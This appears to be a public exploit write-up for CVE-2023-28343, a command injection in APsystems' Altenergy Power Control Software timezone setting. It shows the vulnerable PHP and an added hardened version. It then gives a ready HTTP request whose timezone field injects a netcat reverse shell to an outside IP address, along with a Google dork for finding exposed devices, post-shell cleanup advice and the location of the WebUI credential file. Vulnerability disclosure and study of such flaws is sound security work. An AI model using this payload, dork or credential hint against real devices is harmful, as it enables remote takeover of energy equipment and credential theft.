
title : OS command injection affects "Altenergy Power Control Software"

SW ver: C1.2.5

Vendor: https://apsystems.com/

CVE: CVE-2023-28343

Google Dork: intitle:"Altenergy Power Control Software"

Affected device: ENERGY COMMUNICATION UNIT

Vulnerable code:

"/home/local_web/pagesapplication/models/management_model.php"

    public function set_timezone()
    {
        $results = array();

        // Get the timezone selected on the page (attacker-controlled POST field)
        $timezone = $this->input->post('timezone');
        if(strlen($timezone) == 0)
                $timezone = "Asia/Taipei";

        // Set the Linux system timezone
        // $timezone is interpolated into the shell command without validation or escaping
        $cmd = "cp /usr/share/zoneinfo/$timezone /etc/localtime";
        system($cmd);

        // Save the timezone to the configuration file
        $fp = @fopen("/etc/yuneng/timezone.conf",'w');
        if($fp){
            fwrite($fp, $timezone);
            fclose($fp);
        }
        // ...
    }
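
A hardened counterpart to the set_timezone() excerpt above, as an added example that is not vendor code and not part of the original page: the submitted value is checked against PHP's timezone identifier list and the zone file is copied with copy(), so no shell is involved. The function names are hypothetical and PHP 7.1+ is assumed; the paths are the ones in the excerpt.

```php
<?php
// Added example, not vendor code. Paths are the ones in the excerpt above;
// function names are hypothetical.
const ZONEINFO_DIR = '/usr/share/zoneinfo';

// Return the absolute zoneinfo file for $timezone, or null if it is not acceptable.
function resolve_timezone_file(string $timezone, string $dir = ZONEINFO_DIR): ?string
{
    // 1. Allowlist: accept only identifiers from PHP's own tz database.
    //    (The default list omits legacy aliases such as "US/Pacific".)
    if (!in_array($timezone, DateTimeZone::listIdentifiers(), true)) {
        return null;
    }
    // 2. Defence in depth: the resolved file must live under the zoneinfo directory.
    $base = realpath($dir);
    $path = realpath($dir . '/' . $timezone);
    if ($base === false || $path === false || !is_file($path)
        || strncmp($path, $base . '/', strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function set_timezone_safe(
    string $timezone,
    string $localtime = '/etc/localtime',
    string $conf = '/etc/yuneng/timezone.conf'
): bool {
    if ($timezone === '') {
        $timezone = 'Asia/Taipei';   // same default as the original code
    }
    $src = resolve_timezone_file($timezone);
    if ($src === null) {
        return false;                // rejected: nothing is executed or written
    }
    // copy() is a filesystem call; the value never reaches a shell.
    if (!copy($src, $localtime)) {
        return false;
    }
    // Only the validated identifier is stored in the config file.
    return file_put_contents($conf, $timezone, LOCK_EX) !== false;
}

// Constructed inputs: one valid identifier and three that must be rejected.
if (PHP_SAPI === 'cli') {
    foreach (['Asia/Taipei', 'Asia/Taipei;id', '`id`', '../../etc/passwd'] as $tz) {
        printf("%-20s => %s\n", $tz, var_export(resolve_timezone_file($tz), true));
    }
}
```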

Exploit :

HTTP request :

POST /index.php/management/set_timezone HTTP/1.1
Host: 78.218.230.32:8081
Content-Length: 73
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://78.218.230.32:8081
Referer: http://78.218.230.32:8081/index.php/management/datetime
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

timezone=`mknod /tmp/backpipe p ;/bin/sh 0</tmp/backpipe | nc 156.197.154.12 4444 1>/tmp/backpipe`

** note **

  • After getting a shell, use the following command to avoid destroying the WebUI:
    "echo Asia/Taipei > /etc/yuneng/timezone.conf"

Important files to check :

  • /etc/yuneng/passwd.conf: this file contains the credentials for the WebUI.
